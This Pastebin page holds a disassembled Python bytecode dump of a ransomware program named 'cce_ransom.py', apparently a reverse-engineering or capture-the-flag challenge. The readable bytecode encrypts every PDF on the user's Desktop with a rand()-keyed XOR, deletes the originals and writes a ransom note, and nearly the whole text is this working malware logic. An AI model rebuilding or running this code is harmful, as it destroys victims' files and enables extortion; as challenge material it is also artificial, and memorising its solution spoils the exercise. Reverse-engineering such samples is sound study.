Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- magic b'610d0d0a'
- moddate b'01000000' (Thu Jan 1 09:00:01 1970)
- source_size: 1896731487
- code
- argcount 0
- nlocals 0
- stacksize 7
- flags 0040
- code
- 640064016c005a00640064016c015a01640064016c025a02640064016c03
- 5a03640064016c045a046402640384005a05650664046b02900172486501
- a007a1005a0865016a096a0aa00b6501a00c6508a101a101010065016a09
- 6a0aa00d6508a101010067005a0e67005a0f6502a0106405a0116504a012
- 6406a101a101a101a0036407a10144005d305a1365006a14650565136601
- 64088d025a156515a016a1000100650ea0176513a1010100650fa0176515
- a101010071886409640a8400650f440083010100640b5a186518640c3700
- 5a186518640d37005a186518640e37005a186518640f37005a1865186410
- 37005a186518641137005a186518641237005a18650e44005d225a136518
- 65196513a01aa10083016413170037005a186513a01ba100010090017108
- 6502a0106414a0116504a0126406a101a101a101a01c6518a10101006401
- 5300
- 2 0 LOAD_CONST 0 (0)
- 2 LOAD_CONST 1 (None)
- 4 IMPORT_NAME 0 (threading)
- 6 STORE_NAME 0 (threading)
- 3 8 LOAD_CONST 0 (0)
- 10 LOAD_CONST 1 (None)
- 12 IMPORT_NAME 1 (ctypes)
- 14 STORE_NAME 1 (ctypes)
- 4 16 LOAD_CONST 0 (0)
- 18 LOAD_CONST 1 (None)
- 20 IMPORT_NAME 2 (pathlib)
- 22 STORE_NAME 2 (pathlib)
- 5 24 LOAD_CONST 0 (0)
- 26 LOAD_CONST 1 (None)
- 28 IMPORT_NAME 3 (glob)
- 30 STORE_NAME 3 (glob)
- 6 32 LOAD_CONST 0 (0)
- 34 LOAD_CONST 1 (None)
- 36 IMPORT_NAME 4 (os)
- 38 STORE_NAME 4 (os)
- 8 40 LOAD_CONST 2 (<code object entrypt at 0x10afcb2f0, file "cce_ransom.py", line 8>)
- 42 LOAD_CONST 3 ('entrypt')
- 44 MAKE_FUNCTION 0
- 46 STORE_NAME 5 (entrypt)
- 14 48 LOAD_NAME 6 (__name__)
- 50 LOAD_CONST 4 ('__main__')
- 52 COMPARE_OP 2 (==)
- 54 EXTENDED_ARG 1
- 56 POP_JUMP_IF_FALSE 328
- 15 58 LOAD_NAME 1 (ctypes)
- 60 LOAD_METHOD 7 (c_int)
- 62 CALL_METHOD 0
- 64 STORE_NAME 8 (seed)
- 16 66 LOAD_NAME 1 (ctypes)
- 68 LOAD_ATTR 9 (cdll)
- 70 LOAD_ATTR 10 (msvcrt)
- 72 LOAD_METHOD 11 (rand_s)
- 74 LOAD_NAME 1 (ctypes)
- 76 LOAD_METHOD 12 (pointer)
- 78 LOAD_NAME 8 (seed)
- 80 CALL_METHOD 1
- 82 CALL_METHOD 1
- 84 POP_TOP
- 17 86 LOAD_NAME 1 (ctypes)
- 88 LOAD_ATTR 9 (cdll)
- 90 LOAD_ATTR 10 (msvcrt)
- 92 LOAD_METHOD 13 (srand)
- 94 LOAD_NAME 8 (seed)
- 96 CALL_METHOD 1
- 98 POP_TOP
- 18 100 BUILD_LIST 0
- 102 STORE_NAME 14 (files)
- 19 104 BUILD_LIST 0
- 106 STORE_NAME 15 (threads)
- 20 108 LOAD_NAME 2 (pathlib)
- 110 LOAD_METHOD 16 (Path)
- 112 LOAD_CONST 5 ('{}\\Desktop')
- 114 LOAD_METHOD 17 (format)
- 116 LOAD_NAME 4 (os)
- 118 LOAD_METHOD 18 (getenv)
- 120 LOAD_CONST 6 ('USERPROFILE')
- 122 CALL_METHOD 1
- 124 CALL_METHOD 1
- 126 CALL_METHOD 1
- 128 LOAD_METHOD 3 (glob)
- 130 LOAD_CONST 7 ('*.pdf')
- 132 CALL_METHOD 1
- 134 GET_ITER
- >> 136 FOR_ITER 48 (to 186)
- 138 STORE_NAME 19 (file)
- 21 140 LOAD_NAME 0 (threading)
- 142 LOAD_ATTR 20 (Thread)
- 144 LOAD_NAME 5 (entrypt)
- 146 LOAD_NAME 19 (file)
- 148 BUILD_TUPLE 1
- 150 LOAD_CONST 8 (('target', 'args'))
- 152 CALL_FUNCTION_KW 2
- 154 STORE_NAME 21 (t)
- 22 156 LOAD_NAME 21 (t)
- 158 LOAD_METHOD 22 (start)
- 160 CALL_METHOD 0
- 162 POP_TOP
- 23 164 LOAD_NAME 14 (files)
- 166 LOAD_METHOD 23 (append)
- 168 LOAD_NAME 19 (file)
- 170 CALL_METHOD 1
- 172 POP_TOP
- 24 174 LOAD_NAME 15 (threads)
- 176 LOAD_METHOD 23 (append)
- 178 LOAD_NAME 21 (t)
- 180 CALL_METHOD 1
- 182 POP_TOP
- 184 JUMP_ABSOLUTE 136
- 25 >> 186 LOAD_CONST 9 (<code object <listcomp> at 0x10afcb3a0, file "cce_ransom.py", line 25>)
- 188 LOAD_CONST 10 ('<listcomp>')
- 190 MAKE_FUNCTION 0
- 192 LOAD_NAME 15 (threads)
- 194 GET_ITER
- 196 CALL_FUNCTION 1
- 198 POP_TOP
- 26 200 LOAD_CONST 11 ('What happend to your files?\n')
- 202 STORE_NAME 24 (note)
- 27 204 LOAD_NAME 24 (note)
- 206 LOAD_CONST 12 ('All of your files were protected by a strong encryption with random key based xor cipher\n\n')
- 208 INPLACE_ADD
- 210 STORE_NAME 24 (note)
- 28 212 LOAD_NAME 24 (note)
- 214 LOAD_CONST 13 ('What do I do ?\n')
- 216 INPLACE_ADD
- 218 STORE_NAME 24 (note)
- 29 220 LOAD_NAME 24 (note)
- 222 LOAD_CONST 14 ('So, there are two ways you can choose:\n')
- 224 INPLACE_ADD
- 226 STORE_NAME 24 (note)
- 30 228 LOAD_NAME 24 (note)
- 230 LOAD_CONST 15 ('1. Wait for a miracle and broute force encryption keys\n')
- 232 INPLACE_ADD
- 234 STORE_NAME 24 (note)
- 31 236 LOAD_NAME 24 (note)
- 238 LOAD_CONST 16 ('2. Spot a weakness of encryption scheme.\n\n')
- 240 INPLACE_ADD
- 242 STORE_NAME 24 (note)
- 32 244 LOAD_NAME 24 (note)
- 246 LOAD_CONST 17 ('Good luck!\n\n')
- 248 INPLACE_ADD
- 250 STORE_NAME 24 (note)
- 33 252 LOAD_NAME 24 (note)
- 254 LOAD_CONST 18 ('===== encrypted files =====\n')
- 256 INPLACE_ADD
- 258 STORE_NAME 24 (note)
- 34 260 LOAD_NAME 14 (files)
- 262 GET_ITER
- >> 264 FOR_ITER 34 (to 300)
- 266 STORE_NAME 19 (file)
- 35 268 LOAD_NAME 24 (note)
- 270 LOAD_NAME 25 (str)
- 272 LOAD_NAME 19 (file)
- 274 LOAD_METHOD 26 (absolute)
- 276 CALL_METHOD 0
- 278 CALL_FUNCTION 1
- 280 LOAD_CONST 19 ('\n')
- 282 BINARY_ADD
- 284 INPLACE_ADD
- 286 STORE_NAME 24 (note)
- 36 288 LOAD_NAME 19 (file)
- 290 LOAD_METHOD 27 (unlink)
- 292 CALL_METHOD 0
- 294 POP_TOP
- 296 EXTENDED_ARG 1
- 298 JUMP_ABSOLUTE 264
- 37 >> 300 LOAD_NAME 2 (pathlib)
- 302 LOAD_METHOD 16 (Path)
- 304 LOAD_CONST 20 ('{}\\Desktop\\cce_ransom_note.txt')
- 306 LOAD_METHOD 17 (format)
- 308 LOAD_NAME 4 (os)
- 310 LOAD_METHOD 18 (getenv)
- 312 LOAD_CONST 6 ('USERPROFILE')
- 314 CALL_METHOD 1
- 316 CALL_METHOD 1
- 318 CALL_METHOD 1
- 320 LOAD_METHOD 28 (write_text)
- 322 LOAD_NAME 24 (note)
- 324 CALL_METHOD 1
- 326 POP_TOP
- >> 328 LOAD_CONST 1 (None)
- 330 RETURN_VALUE
- consts
- 0
- None
- code
- argcount 1
- nlocals 3
- stacksize 6
- flags 0043
- code
- 74007c00a001a10083017d0174027c00a003a1006a04830144005d207d02
- 7c017c020500190074056a066a07a008a100640140004e0003003c00711a
- 7409a00a740b7c00a00ca100830164021700a101a00d7c01a10101006400
- 5300
- 9 0 LOAD_GLOBAL 0 (bytearray)
- 2 LOAD_FAST 0 (file)
- 4 LOAD_METHOD 1 (read_bytes)
- 6 CALL_METHOD 0
- 8 CALL_FUNCTION 1
- 10 STORE_FAST 1 (content)
- 10 12 LOAD_GLOBAL 2 (range)
- 14 LOAD_FAST 0 (file)
- 16 LOAD_METHOD 3 (stat)
- 18 CALL_METHOD 0
- 20 LOAD_ATTR 4 (st_size)
- 22 CALL_FUNCTION 1
- 24 GET_ITER
- >> 26 FOR_ITER 32 (to 60)
- 28 STORE_FAST 2 (i)
- 11 30 LOAD_FAST 1 (content)
- 32 LOAD_FAST 2 (i)
- 34 DUP_TOP_TWO
- 36 BINARY_SUBSCR
- 38 LOAD_GLOBAL 5 (ctypes)
- 40 LOAD_ATTR 6 (cdll)
- 42 LOAD_ATTR 7 (msvcrt)
- 44 LOAD_METHOD 8 (rand)
- 46 CALL_METHOD 0
- 48 LOAD_CONST 1 (255)
- 50 BINARY_AND
- 52 INPLACE_XOR
- 54 ROT_THREE
- 56 STORE_SUBSCR
- 58 JUMP_ABSOLUTE 26
- 12 >> 60 LOAD_GLOBAL 9 (pathlib)
- 62 LOAD_METHOD 10 (Path)
- 64 LOAD_GLOBAL 11 (str)
- 66 LOAD_FAST 0 (file)
- 68 LOAD_METHOD 12 (absolute)
- 70 CALL_METHOD 0
- 72 CALL_FUNCTION 1
- 74 LOAD_CONST 2 ('_cce_ransom')
- 76 BINARY_ADD
- 78 CALL_METHOD 1
- 80 LOAD_METHOD 13 (write_bytes)
- 82 LOAD_FAST 1 (content)
- 84 CALL_METHOD 1
- 86 POP_TOP
- 88 LOAD_CONST 0 (None)
- 90 RETURN_VALUE
- consts
- None
- 255
- '_cce_ransom'
- names ('bytearray', 'read_bytes', 'range', 'stat', 'st_size', 'ctypes', 'cdll', 'msvcrt', 'rand', 'pathlib', 'Path', 'str', 'absolute', 'write_bytes')
- varnames ('file', 'content', 'i')
- freevars ()
- cellvars ()
- filename 'cce_ransom.py'
- name 'entrypt'
- firstlineno 8
- lnotab 00010c0112011e01
- 'entrypt'
- '__main__'
- '{}\\Desktop'
- 'USERPROFILE'
- '*.pdf'
- ('target', 'args')
- code
- argcount 1
- nlocals 2
- stacksize 4
- flags 0043
- code 67007c005d0c7d017c01a000a100910271045300
- 25 0 BUILD_LIST 0
- 2 LOAD_FAST 0 (.0)
- >> 4 FOR_ITER 12 (to 18)
- 6 STORE_FAST 1 (t)
- 8 LOAD_FAST 1 (t)
- 10 LOAD_METHOD 0 (join)
- 12 CALL_METHOD 0
- 14 LIST_APPEND 2
- 16 JUMP_ABSOLUTE 4
- >> 18 RETURN_VALUE
- consts
- names ('join',)
- varnames ('.0', 't')
- freevars ()
- cellvars ()
- filename 'cce_ransom.py'
- name '<listcomp>'
- firstlineno 25
- lnotab
- '<listcomp>'
- 'What happend to your files?\n'
- 'All of your files were protected by a strong encryption with random key based xor cipher\n\n'
- 'What do I do ?\n'
- 'So, there are two ways you can choose:\n'
- '1. Wait for a miracle and broute force encryption keys\n'
- '2. Spot a weakness of encryption scheme.\n\n'
- 'Good luck!\n\n'
- '===== encrypted files =====\n'
- '\n'
- '{}\\Desktop\\cce_ransom_note.txt'
- names ('threading', 'ctypes', 'pathlib', 'glob', 'os', 'entrypt', '__name__', 'c_int', 'seed', 'cdll', 'msvcrt', 'rand_s', 'pointer', 'srand', 'files', 'threads', 'Path', 'format', 'getenv', 'file', 'Thread', 't', 'start', 'append', 'note', 'str', 'absolute', 'unlink', 'write_text')
- varnames ()
- freevars ()
- cellvars ()
- filename 'cce_ransom.py'
- name '<module>'
- firstlineno 2
- lnotab
- 0801080108010801080208060a01080114010e0104010401200110010801
- 0a010c010e0104010801080108010801080108010801080114010c01
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
